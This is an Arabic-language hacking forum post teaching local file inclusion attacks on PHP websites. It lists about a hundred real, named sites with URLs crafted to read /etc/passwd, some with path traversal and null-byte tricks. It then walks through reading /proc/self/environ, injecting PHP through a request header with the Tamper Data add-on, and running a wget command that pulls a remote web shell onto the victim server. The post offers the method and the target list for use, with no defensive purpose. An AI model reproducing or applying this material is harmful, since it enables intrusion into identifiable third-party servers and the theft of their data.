منتديات, اختراق, عبرtamper_data, فيديو
السلام عليكم ورحمة الله وبركاتة
كيفكم اخواني اتمنا الجميع بخير وصحة وعافية
حبيت اطرح هاذا الشرح لجل الافادة واتمنا انه يفديكم
المتطلبات
1. FireFox [
download]
2.
Tamper Data [download]
والموقع المراد التطبيق علية
انا جبت لكم كم موقع
كود PHP:
http://www.walkandtrain.com/index.php?x=/etc/passwd
http://www.tridentservice.ro/index.php?pg=/etc/passwd
http://www.creepycrawlerpetsitting.c...?x=/etc/passwd
http://www.cazino-monteoru.ro/index.php?pg=/etc/passwd
http://www.indoeditions.com/index.php?page=/etc/passwd
http://www.jerusalemexport.com/index.../../etc/passwd
http://www.ellesmereoperatic.co.uk/i...ge=/etc/passwd
http://beta.ctcdata.org/index.php?page=/etc/passwd
http://kyengerarotaryclub.org/index.php?page=/etc/passwd
http://www.crsfsite.net/main/index.php?page=/etc/passwd
http://modelspromo.com/index.php?page=/etc/passwd
http://www.mrt.ac.lk/gavel/index.php?page=/etc/passwd
http://nyctradeprinting.com/index.php?page=/etc/passwd
http://www.dayborodistrict.com.au/index.php?page=/etc/passwd
http://schumpeter2011.econ.tuwien.ac.at/index.php?page=/etc/passwd
http://www.alinholding.com/index.php?page=/etc/passwd&page_title=home
http://diuf.unifr.ch/pai/education/2006_2007/ca/index.php?page=/etc/passwd&subpage=/etc/passwd
http://lyantndc.cluster010.ovh.net/index.php?page=/etc/passwd
http://mspierphoto.com/index.php?page=/etc/passwd
http://www.tottenfarms.com/index.php?site=1&page=/etc/passwd
http://www.sohnidharti.tv/main/Urdu/index.php?page=/etc/passwd
http://www.crsfsite.net/main/index.php?page=/etc/passwd
http://www.expo-ingenieurs.be/index.php?lang=FR&page=/etc/passwd
http://www.lovium.nl/index.php?page=/etc/passwd
http://www.death-star.net/index.php?Page=/etc/passwd
http://www.f-a-t.de/fat_v1/index.php?lang_id=2&page=/etc/passwd
http://www.jpistudios.com/redirect.php?page=../../../../../../etc/passwd%00
http://x17agency.com/redirect.php?page=../../../../../etc/passwd%00
http://www.winnerspizza.com/index.php?page=/etc/passwd
http://oregon-airsoft.com/index.php?page=/etc/passwd
http://www.eyesonmain.ca/index.php?page=/etc/passwd
http://www.tottenfarms.com/index.php?page=/etc/passwd
http://www.rtscom.com/index.php?page=/etc/passwd
http://www.lavieillefrance.fr/index.php?page=/etc/passwd
http://www.evoca.ch/index.php?page=../etc/passwd
http://estaminetlille.fr/vieille/index.php?page=/etc/passwd
http://www.traildumont.be/index.php?page=/etc/passwd&album=12
http://www.speakingfromtheheartinc.com/index.php?page=/etc/passwd
http://www.moto-plus.net/index.php?Page=../../../../../etc/passwd
http://www.maxparts.ru/index.php?page=/etc/passwd
http://www.focusfloors.co.za/?page=../../../../etc/passwd
http://www.bushboats.co.za/index.php?page=../../../../etc/passwd
http://www.creteform.com/index.php?page=/etc/passwd&PHPSESSID=null
http://www.dreisingerfuneralhome.com/index.php?page=../../../../../etc/passwd
http://www.iceclub.biz/index.php?page=../../../../etc/passwd
http://www.daybororuralfire.com.au/index.php?page=/etc/passwd
http://www.spcstamps.com/index.php?page=/etc/passwd&back=null
http://www.ninaal.pl/index.php?page=../etc/passwd
http://www.tempelwelt.de/index.php?page=../../../../etc/passwd&PHPSESSID=null
http://www.mescreations.fr/index.php?page=../../../../etc/passwd
http://www.death-star.net/index.php?Page=/etc/passwd&Mode=MDP
http://www.scoberbernbach.de/index.php?page=/etc/passwd
http://lomejordehuelva.com/index.php?page=/etc/passwd
http://pomestam24.ru/index.php?page=/etc/passwd&option=login
http://www.kaltimmethanol.com/indo/index.php?page=/etc/passwd
http://winnerspizza.com/index.php?page=/etc/passwd
http://timslist.com/utechtube/index.php?page=/etc/passwd
http://www.fuw.edu.pl/~trawinski/index.php?page=/etc/passwd
http://www.memorial-odlozil.cz/odlozil/index.php?page=/etc/passwd
http://maxponomarenko.ru/index.php?page=/etc/passwd
http://shotgun.cc/index.php?page=/etc/passwd
http://www.fair-wohnen.de/index.php?page=../../../../../../etc/passwd
http://jhcs.eu/index.php?folder=Kontakt&page=../../../../../etc/passwd
http://www.rheuma-liga.selbsthilfe-wue.de/index.php?page=/etc/passwd&titel=Kontakt
http://www.hamann-lege.de/index.php?page=/etc/passwd
http://www.ulmer-verein.de/uv/index.php?page=/etc/passwd
http://proimmo360.com/index.php?page=/etc/passwd
http://www.lelo.biz/index.php?name=Kontakt&page=/etc/passwd&items=4
http://www.misbrugscenterherning.dk/index.php?page=../../../../../etc/passwd
http://www.wti-juelich.de/index.php?page=/etc/passwd
http://www.sekoro.seko-bayern.org/index.php?page=/etc/passwd
http://www.immobilieninvest.at/index.php?page=/etc/passwd&PHPSESSID=null
http://www.lc-bensberg-schloss.de/index.php?page=../../../../../../../../etc/passwd
http://www.ingolstadt.muetterzentren-bayern.de/index.php?page=/etc/passwd
http://www.tendokarate.no/index.php?page=/etc/passwd
http://www.mstechnical.pl/de/index.php?page=/etc/passwd
http://www.k-turm.de/index.php?page=/etc/passwd
http://wsc-skiextreme.wir-und-ich.de/index.php?page=../../../etc/passwd
http://www.seniorenbueros-bayern.de/index.php?page=/etc/passwd&titel=Kontakt
http://www.bodyworld-schkeuditz.de/index.php?page=/etc/passwd
http://www.fortschrittwuerzburg.selbsthilfe-wue.de/index.php?page=/etc/passwd&titel=Kontakt
http://www.spielmannszug-ffw-oberkotzau.de/index.php?page=/etc/passwd
http://proimmo360.com/index.php?page=/etc/passwd
http://www.grabowscy.com/index.php?page=/etc/passwd
http://www.heilpraxis-geissdoerfer.de/index.php?page=/etc/passwd
http://www.selfclean.de/index.php?page=/etc/passwd
http://www.ninaal.pl/index.php?page=../etc/passwd
http://www.cncmodel.pl/eng/index.php?page=/etc/passwd
http://walk-in-the-park.de/index.php?page=/etc/passwd
http://www.k-tower.eu/index.php?page=/etc/passwd
http://dorfschuetzen.de.dedi926.your-server.de/index.php?page=/etc/passwd&PHPSESSID=null
http://www.ma2da.de/index.php?page=/etc/passwd
http://www.frauentreff-welden.de/index.php?page=/etc/passwd
http://etechnik-wichmann.de/index.php?page=../../../../etc/passwd
http://www.erotik-als-lebenskraft.de/index.php?page=/etc/passwd
http://84388.webhosting28.1blu.de/huchbaumanagement/index.php?page=/etc/passwd
http://www.stotterer-selbsthilfe-regensburg.seko-bayern.org/index.php?page=/etc/passwd
http://www.muezeger.de/index.php?page=/etc/passwd
http://schlafapnoe.selbsthilfe-wue.de/index.php?page=/etc/passwd
http://www.hctjstbk.cz/index.php?page=/etc/passwd
http://violetta-tradgard.se/index.php?page=/etc/passwd
http://www.sdhpardubice.cz/index.php?page=/etc/passwd
http://www.osteoporose.selbsthilfe-wue.de/index.php?page=/etc/passwd
http://www.die-drid.de/index.php?mod=kontaktmenu.php&page=/etc/passwd
طيب نكمل
في البداية لازم نقدر نقرى proc/self/environ
اضغط هنا لترى الصورة بحجمها الطبيعى
بعد مايضبط الشغل نروح نشغل اداة تمبلر داتا
بعد ماتشتغل معنا الاداة
نروح لم
بعدها نروح لم الموقع حقنا ونعمل تحديث وراح تخرج لن هل النافذة
بعدها نروح للمربع هاذا
في هاذا المربع وضعنا
<?php phpinfo();?>
عشان نقرة phpinfo ونضمن الشغل
بعد ماتضغط اوك راح تخرج لك كم نافضة اضغط على الكل
بعدها ماتضغط وتتخطى
يفتح الموقع ويتم قراة phpinfo
ومنها راح نشوف ادوال والسيف مود وغيرها امر مهم قبل رفع الشل
<?exec('wget http://www.site.com/shell.txt -O shell.php');?>
هاذي هي الدالة exec الي راح نسخدمها لسحب الملف طبعن تقدر تغيرها اذا كانت ممنوعه
الى chmod
system
ومع شوي تطوير راح تضبط
بعدها
نروح نشوف
راح يفتح الموقع مثل ماكان
طيب لما تنتهي من الحقن مثال هل الموقع
http://www.site.com/index.php?page=/etc/passwd
نمسح
index.php?page=/etc/passwd
ونحط
http://www.site.com/shell.php
وباذن الله راح يتم الرفع الشل
وهدا شرح فيديو .gif "SnipeR (61)")
للي ما فهم من الصور
www.youtube.com/watch?v=lZEK84sat9s
منتديات بحر الابداع
.gif "SnipeR (29)")
،
hojvhr lkj]dhj vb ufvtamper_data - avp w,v + td]d,